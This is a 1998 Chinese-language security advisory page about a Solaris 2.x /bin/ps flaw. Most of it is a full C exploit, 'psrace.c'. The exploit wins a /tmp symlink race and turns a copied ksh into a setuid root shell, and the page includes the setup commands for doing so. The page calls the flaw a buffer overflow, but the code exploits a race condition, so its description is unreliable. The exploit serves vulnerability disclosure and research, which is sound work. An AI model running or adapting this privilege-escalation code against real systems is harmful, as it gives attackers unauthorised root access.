安全研究
安全漏洞
Solaris 2.x (Sunos 5.x)中的ps漏洞
发布日期:1998-03-11
更新日期:1998-03-11
受影响系统:
Solaris 2.x描述:
SunOS 5.x
/bin/ps存在缓冲区溢出漏洞,可让攻击者获得root权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* psrace.c
*
* Copyright, 1995, by Scott Chasin (chasin@crimelab.com)
*
* This material is copyrighted by Scott Chasin, 1995. The
* usual standard disclaimer applies, especially the fact that the
* author is not liable for any damages caused by direct or indirect
* use of the information or functionality provided by this program.
*
* [ For solaris2.x only ]
*
* After compiling psrace, run the following commands:
*
* cp /bin/ksh $HOME/rootshell; chmod 14755 $HOME/rootshell
* /bin/sh -c 'while /bin/true ; do ps > /dev/null ; done' &
* ./psrace $HOME/rootshell
*
* (Ignore any errors you get from ps)
* You may have to wait a few minutes before the race is won.
*/
#include <stdio.h>
#include <sys/types.h>
#include <dirent.h>
#include <sys/stat.h>
main (argc, argv)
int argc;
char **argv;
{
int count = 0;
DIR *dirp;
struct dirent *dp;
struct stat fileinfo;
char targetfile [85], name [85];
if (argc != 2)
{
printf ("Usage: psrace [/full/path/to/target/filename]\n");
exit (1);
}
if (access (argv[1], 0))
{
printf ("psrace: %s does not exist.\n", argv[1]);
exit (1);
}
strcpy (targetfile, argv[1]);
stat ("/tmp", &fileinfo);
if (fileinfo.st_mode & S_ISVTX)
{
printf ("psrace: Congratulations! You already have the fix in place.\n");
printf ("psrace: (/tmp has the sticky-bit set)\n");
exit (1);
}
printf ("Be patient, this could take awhile.\n");
printf ("Starting the race .. ");
fflush (stdout);
dirp = opendir ("/tmp");
for (;;)
{
unlink ("/tmp/ps_data");
while ((dp = readdir (dirp)) != NULL)
{
if (!strncmp (dp->d_name, "ps.", 3))
{
sprintf (name, "/tmp/%s", dp->d_name);
unlink (name);
symlink (targetfile, name);
if (stat (targetfile, &fileinfo) >= 0)
if (fileinfo.st_uid == 0)
{
printf ("We WON!\n");
closedir (dirp);
clean_up ();
}
}
}
rewinddir (dirp);
}
}
clean_up ()
{
DIR *dirp;
struct dirent *dp;
char name [25];
dirp = opendir ("/tmp");
while ((dp = readdir (dirp)) != NULL)
if (!strncmp (dp->d_name, "ps.", 3))
{
sprintf (name, "/tmp/%s", dp->d_name);
unlink (name);
}
closedir (dirp);
unlink ("/tmp/ps_data");
exit (0);
}
建议:
到www.sun.com去寻找最新补丁。
浏览次数:22674
严重程度:0(网友投票)
绿盟科技给您安全的保障